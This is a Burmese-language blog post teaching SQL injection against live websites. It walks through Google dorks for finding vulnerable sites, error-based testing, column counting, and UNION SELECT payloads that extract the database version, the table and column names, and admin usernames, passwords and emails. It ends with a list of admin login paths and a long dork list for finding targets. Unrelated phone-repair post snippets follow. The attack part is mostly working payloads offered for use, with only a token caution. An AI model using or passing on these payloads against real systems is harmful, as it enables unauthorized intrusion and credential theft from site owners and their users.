Skip to main content

Hacking ဆိုတာစိတ္ဝင္စားတယ္ အကိုအမ ေတြ နည္းနည္းၾကည့္ေပါ့

Hacking ဆိုတာစိတ္ဝင္စားတယ္ အကိုအမ ေတြ နည္းနည္းၾကည့္ေပါ့ဟုဟု
Sql injection
ကၽြန္ေတာ္ hacking ကို တင္ဖို႔ ေတာ္ေတာ္ေလးကို စဥ္းစားခဲ့ရပါတယ္။ ဘာလို႔လဲဆိုေတာ့ ေတာ္ေတာ္မ်ားမ်ား ေလ့စာကာစသူေတြဟာ လက္တည့္စမ္းတတ္ၾကလို႔ပါ။ ဟက္ကင္းကို ေလ့လာၿပီဆိုရင္ေတာ့ လက္တည့္မစမ္းလို႔လည္းမရဘူးေလ မ်ားမ်ားေလ့က်င့္မွ တစ္ကယ္တတ္ေတာ့မွာေပါ့။ ဒါေပမယ့္ စမ္းခ်င္တယ္ဆိုရင္လည္း သတိေလးထားၿပီးေတာ့ စမ္းေစခ်င္တယ္။ ေနာက္ၿပီး လူအမ်ားအတြက္ တစ္ကယ္ကိုအသံုး၀င္ေနတဲ့ဆိုက္ေတြကို မဟက္ေစခ်င္ဘူး။ ၿပီးေတာ့ ကိုယ့္ကိုယ္ကိုယ္လည္း ကာကြယ္ထားရလိမ့္မယ္ အဲဒါမွ အဆင္ေျပလိမ့္မယ္။ ေနာက္ပီးေတာ့ ကၽြန္ေတာ္ကလည္း hacking ကို ဘာမွမသိေတာ့ request ျပန္လာမွာလည္းစိုးတယ္ဗ်.....ဟဲဟဲ... ႀကိဳပိတ္ထားတာေနာ္။ ေနာက္ hacking နဲ႔ပါတ္သတ္ရင္ ကၽြန္ေတာ့ကို မေမးေၾကးေနာ္။ ကဲကဲ ေအာက္မွာ ဆက္ေလ့လာလိုက္ပါေနာ္...။
Sql injection ဆိုတာ application ေတြရဲ႕ Database Layer ေပၚမွာ အသံုးခ်ျပီး code ေတြကို inject လုပ္တဲ႔နည္းလမ္းတစ္ခုပါ
vulnerable ကဘယ္လို အလုပ္လုပ္လဲဆိုရင္ user က input ထည္႔လိုက္တဲ႔အခါ SQL statement ထဲမွာျမဳပ္ထားတဲ႔ string character ေတြကမွန္မမွန္စစ္ထုတ္ျပီးအလုပ္လုပ္ပါတယ္
ွျပီးေတာ႔ Sql injection ကို Sql insertion attack လို႔လည္းတစ္ခ်ိဳ႕ကေခၚၾကပါတယ္
အေသးစိတ္သိခ်င္ရင္ေတာ႔ ဒီမွာသြားၾကည္႔ပါ
အဆင္႔ (၁) ယိုေပါက္ ရွိတဲ႔ website ကိုရွာရပါမယ္ (vulnerable website) ဒါမွာ လုုပ္လို႔ရမွာပါ
အဲဒါကိုရွာဖို႔ dork ေတြသံုးလို႔ရပါတယ္ ျပီးေတာ႔ vul scanner ေတြသံုးျပီးေတာ႔လည္းရွာလို႔ရပါတယ္ အဆင္ေျပသလိုရွာေပါ႔ဗ်ာ
Dork ဆိုတာ ယိုေပါက္ေတြရွိတဲ႔ website ေတြရဲ႕လိပ္စာပါ ဒီလိုမ်ိဳးေရးပါတယ္
inurl:news.php?id=
ဥပမာ vul ဆိုက္ေလးတစ္ခုေတြျပီဆိုပါစို႕
အဲဒီဆိုက္ေလးက vul ျဖစ္လားမျဖစ္ဘူးဆိုတာစမ္းဖို႔ ကၽြန္ေတာ္တို႔ id=1 ဆိုတဲ႔ေနရာမွာ double code နဲ႔ single code ေတြကိုသံုးရမွာပါ
"=" & '='
ဒီလိုမ်ိဳးထပ္ျဖစ္မွာပါ
ode ခံျပီး enter နွိပ္ၾကည္႔ပါ၊ error message တက္လာတာေတြ႔လား မေတြ႔ဘူးဆိုရင္ေတာ႔ vul မျဖစ္လိုပါပဲ႔ (ဒါဆိုအျခားနည္းသံုး ဟိဟိ)
error တက္ျပီဆိုရင္ေတာ႔ ၀မ္းသာလိုက္စမ္းပါ (developer coding ညံ႕လို႔ error တက္တာ ဟီး)
error ကဒီလိုမ်ိဳးေလးပါ
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in www/home/cyberoot/public_html/news.php on line 21
ဒါကဥပမာျပတာပါ အျခားerror message မ်ိဳးလည္းေတြ႔ရပါတယ္ ဒီလိုမ်ိဳးသာေပၚရင္ injection လုပ္လို႔ရတယ္ဆိုတာ website ကေျပာေနသလိုပါပဲ႔
အဲေနာက္တစ္ခုက်န္ေသးတယ္
ဒီလိုမ်ိဳး url ဆိုရင္ေကာ vulnerable ဘယ္လိုရွာမလဲ
concept ကတူတူပဲ႔ဗ် အေပၚကနည္းအတိုင္းပဲ႔ရွာလိုက္
အဆင္႔(၂) columns ရွာမယ္
column ကိုရွာဖို႔ Order by command ကိုသံုးရမွာပါ
http://www.site.com/news.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/news.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/news.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/news.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/news.php?id=1 ORDER BY 5-- <---Error
အဲဒါကိုတစ္ေၾကာင္းစီစမ္းရမွာပါ
ဒါက column 4 ခုရွိတာကိုျပတာပါပဲ႔
အကယ္ရွ္ order by 8-- ေရာက္မွ Error ျပတယ္ဆိုရင္ column 7 ခုရွိတယ္လို႔ဆိုလိုပါတယ္
SQL QUERY ေနာက္မွာ Double null (--)ထည္ဖို႔လံုး၀မေမ႔ပါနဲ႔ အဲဒါမပါရင္အလုပ္္မလုပ္ဘူးဗ်
အဆင္႔(၃) ဘယ္ column number ကေပါက္ေနတာလဲ
ေစာေစာက order by သံုးျပီး column ဘယ္နွစ္ခုရွိတာလဲဆိုတာရွာျပီးျပီ မဟုတ္လား
ကၽြန္ေတာ္တို႔ရွာထားတာက column 4 ခုရွိတယ္ မွတ္ထားဦး
ဟုတ္ပါျပီး အဲဒီ column 4 ခုထဲ႔ကမွ ဘယ္နံပါတ္က vul ျဖစ္တယ္ဆိုတာ ဆက္ရွာမယ္ဟုတ္လား ဟားဟားဟား ဘယ္ေျပးမလဲမိေဆြသဲ ကြိေတာ႔မယ္
ဒီလိုမ်ိဳးထပ္ရွာဖို႔ ကၽြန္ေတာ္တို႔ union and select query ကိုဆက္သံုးရမွာပါ string ရဲ႕အေနာက္မွာ double null(--) ကိုဆက္ဆြဲရမွာပါ
http://www.site.com/news.php?id=1 UNION SELECT 1,2,3,4--
or
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
အခုဆိုရင္ သင္ site ေပၚမွာ column နံပါတ္ေတြေပၚေနတာေတြ႔ရပါလိမ္႔မယ္
ဥပမာ 1234 အဲဒါေတြက coloumn name number ေတြပါ
အဆင္႔(၄) database version ရွာပါမယ္
ကၽြန္ေတာ္ေရးတဲ႔ tutorial ေအာက္က အပုိင္းက version 5 အထက္အတြက္ပါ
ေစာေစာတုန္းက 2 ဆိုတဲ႔ vlu column ကုိေတြ႔ျပီဆိုပါစို႔
http://www.site.com/news.php?id=-1 UNION SELECT 1,@@version,3,4--
@@version ဆိုတာကို 2 ဆိုတဲ႔ column မွာအစားသြင္းျပီး inject လုပ္လိုက္တာပါပဲ႔ အျခား ပံုစံတစ္ခုကိုလည္းအစားသြင္းလို႔ရပါတယ္ "version()"
အဲလိုေရးလို႔မွ database version ကိုမျပေသးဘူးဆိုရင္ေတာ႔ unhex(hex()) ကိုဆက္သံုးရမွာပါ ဆက္ေလွ်ာက္
http://www.site.com/news.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--
ဒီလိုဆိုရင္ေတာ႔ version ကိုဒီလိုမ်ဳိးေလးေတြ႔ပါျပီ
5.1.47-community-log
ဒါက ဒီ website မွာသံုးထားတဲ႔ database version ပါ
အဆင္႔(၅) database name ကိုရွာမယ္
database ရွာဖို႔အတြက္ ကၽြန္ေတာ္တို႔ဒီလုိေရးရပါမယ္
http://www.site.com/news.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--
or
http://www.site.com/news.php?id=-1 UNION SELECT 1,concat(database()),3,4--
ဟုတ္ျပီ ဒါဆုိရင္ database name ကိုေတြ႔ပါျပီ အဲဒီနာမည္ကို ခဏေလးမွတ္ျပီး တစ္ေနရာမွာသိမ္းထားပါဦး ေနာက္မွျပန္ယူသံုးမယ္
အဆင္႔(၆) table name ရွာမယ္
http://www.site.com/news.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
or
http://www.site.com/news.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--
or
http://www.site.com/news.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--
ဒီေလာက္ဆို table name ကိုရေလာက္ပါျပီ
အဆင္႔(၇) column name ကိုရွာမယ္
ေစာေစာတုန္က table name ေတြရွာခဲ႔တယ္ အဲဒီတုန္းက table nameေတြက္ ဒီလုိပံုစံမ်ဳိးျဖစ္ေနလိမ႔္႔မယ္ User(s), Admin(s), tblUser(s) စသည္ျဖင္႔...
information ေတြက ဘယ္ table မွာပါတယ္ဆိုတာခန္႔မွန္းျပီ ေတာ႔ ကၽြန္ေတာ္ကေတာ႔ Adminဆုိတဲ႔ table ကုိပဲ႔ေရြးလုိက္ပါတယ္
ဒါေၾကာင္႔
http://www.site.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
အဲဒါဆိုရင္ admin table ထဲမွာရွိတဲ႔ column table list အားလံုးကိုျပေပးမွာပါ
အကယ္ရွ္ error ျပေနတယ္ဆိုရင္ကၽြန္ေတာ္တုိ႔ hex လုပ္ဖို႔ထပ္လိုျပန္ျပီ
ေစာေစာတုန္းက admin ဆိုတာကို hex နဲ႔ ေျပာင္းလိုက္ပါ
Hex/Char Converte
ဒီလိုမ်ိဳးျဖစ္သြားပါလိမ္႔မယ္
http://www.site.com/news.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
" Admin"=0x41646d696e
string to hex // 0x ဆိုတာ hex သံုးတာကိုဆိုတာပါ
အခုဆိုရင္ table ထဲမွာရွိတဲ႔ column name ေတြကုိျမင္ရပါျပီ username ,password,email ,စသည္ျဖင္႔ေပါ႔
ကၽြန္ေတာ္ကေတာ႔ username ,password,email ပဲ႔သိခ်င္တယ္ဆိုေတာ႔ အဲဒါကိုပဲ႔ inject လုပ္မွာပါ ျပီးေတာ႔
ေစာေစာတုန္းက ကၽြန္ေတာ္သိမ္းခိုုင္းထားတဲ႔ database name ေလးကိုျပန္သံုးမယ္ဗ်ာ (ကၽြန္ေတာ္ကေတာ႔ database name ကို dbcar လိုသတ္မွတ္လိုက္တယ္)
http://www.site.com/news.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM dbcar.Admin--
ဆိုလိုတာက Admin table ထဲမွာရွိတဲ႔ dbcar ဆိုတဲ႔ database name ထဲက column name ျဖစ္တဲ႔ username,password,email ကိုဆြဲထုတ္တာပါပဲ႔
အဲဒီမွာ ကၽြန္ေတာ္က 0x3a ဆိုတာကိုသံုးတာတယ္ ဒါကဘာလဲဆိုေတာ႔ : ဆိုတဲ႔ hex ပါ username နဲ႔ password ၾကားမွာမေရာေအာင္လို႔ခြဲေပးထားတာပါ
ဒီလိုုမ်ိဳးေလးျမင္ရမွာပါ
username : password : email
admin : cyberoot : cyberoot1@gmail.com
ဒါဆိုရင္ ကၽြန္ေတာ္တို႔ inject လုပ္တဲ႔ ဆိုက္ရဲ႕ username and password ကိုရသြားပါျပီ
နားလည္မယ္လို႔ထင္ပါတယ္
ေနာက္ဆံုးအဆင္႔ ကေတာ႔ login page ရွာဖိို႔ပါ
ပံုမွန္အားျဖင္႔ login page ကဆိုက္ရဲ႕အေနာက္နားမွာပဲ႔ရွိတတ္ပါတယ္
ဒီလိုမ်ိဳးပါ
http://www.site.com/admin or admin.php,admin.asp,admin.html
http://www.site.com/administrator ဒီလိုမ်ိဳးကို Joomla website ေတြမွာေတြ႔ရပါတယ္
http://www.site.com/wp-contant world press မွာေတြ႔ရတတ္ပါတယ္
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator
အျခား adminpage ကိုရွာတဲ႔ Tool ေတြနဲ႔ နည္းလမ္းေတြအမ်ားၾကီးရွိပါတယ္ အဆင္ေျပသလိုရွာေပါ႔
Written by cyberoot or Hacker625
SQL Dork List:
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
                                           lwannlwann

Comments

Popular Posts

Qualcomm Mode ( QDloader 9008 Mode) ဝင်နည်း

        9008 Mode ဆိုတာ Qualcomm processer ရဲ့ Emergency Download Mode ကို ဆိုလိုတာပါ။ 9008 ကို တစ်နည်းအားဖြင့် Qualcomm HS USB QDloader Mode လို့လဲခေါ်ပါတယ် Qualcomm ဖုန်းတစ်လုံး Hardware ပိုင်းသာ ကောင်းနေပါစေ 9008 Mode ၀င်လို့ ရ ရင် Software ပိုင်းအနေနဲ့ ဘာပဲဖြစ်နေဖြစ်နေ ကယ်တင်လို့ ရပါတယ်။ 9008 Mode ၀င်ဖို့ Computer မှာ Qualcomm Hs USb Driver ကိုတော့ မောင်းနှင်ပေးထားရပါမယ်။ Xiaomi Bootloader Lock ဖုန်းတွေကို Firmware ပြန်တင်ဖို့ဆိုရင်တော့ 9008 Mode မှ တင်ပေးရပါတယ်။ ADB Command ဖြင့် 9008 mode ဝင်နည်း             Adb Mode သိသေးတဲ့ အနေအထားဆိုရင် adb reboot edl လို့ ရိုက်လိုက်ပါက 9008 ကို ရောက်ပါတယ် ။ 9008 ကို ရောက်မရောက် ဘယ်လိုကြည့် မလဲ ဆိုတော့ Computer မှာ window key+R key ကို တွဲနှိပ်ပြီး RUN Box ခေါ်လိုက်ပါ ပြီးရင် devmgmt.msc လို့ ရိုက်လိုက် Device Manager ကိုရောက်သွားရင် Device Manager ရဲ့ Ports(COM&LPT) ဆိုတဲ့ နေရာမှာ Qualcomm HS-USB QDloader 9008 ( COM*) ဆိုပြီးပေါ်နေပါလိမ့်မယ် သို့သော် ဒီနည်းကအလုံးတိုင်းတော့ ရမည် မဟုတ်ပါ။    

Xiaomi Phone Test Point

Mi Note 3 Mi Mix 2 Mi Mix MI Max 2 Mi Max Mi A1 Mi 6 Mi 5x Mi 5s Plus Mi 5s Mi 5 Mi 4 Mi 3 Mi 2 Redmi 2 Redmi 3 Redmi 3x/s Redmi 4 Redmi 4a Redmi 5 Plus Redmi 5 Redmi 5a Redmi Note 5a Redmi Note 4x Redmi Note 3 Pro Redmi Note 4G

HUAWEI NOTI THEME FIXER

Huawei phone တွေ Firmware ရေးပြီး နို့သီး အလုပ်မလုပ်လျှင် Fix လုပ်လို့ရမယ့် Software လေးပါ😋၊ EMMC Info တွေလည်း ကြည့်လို့ ရပါတယ်၊ 830 MB ကျော်တဲ့ Software ကို 2MB ဖြစ်အောင် High Compress လုပ်ထားတဲ့အတွက် ဒေါင်းတဲ့သူတွေ ဖုန်းဘေ အကုန်အကျ အရမ်းသက်သာပါတယ်၊  လိုအပ်တဲ့သူတွေ၊ စမ်းကြည့်ချင်တဲ့ သူတွေ အောက်က Link ကိုနှိပ်ပြီး ဒေါင်းထားကြပေါ့။ credit>GSM Crack and Solution Download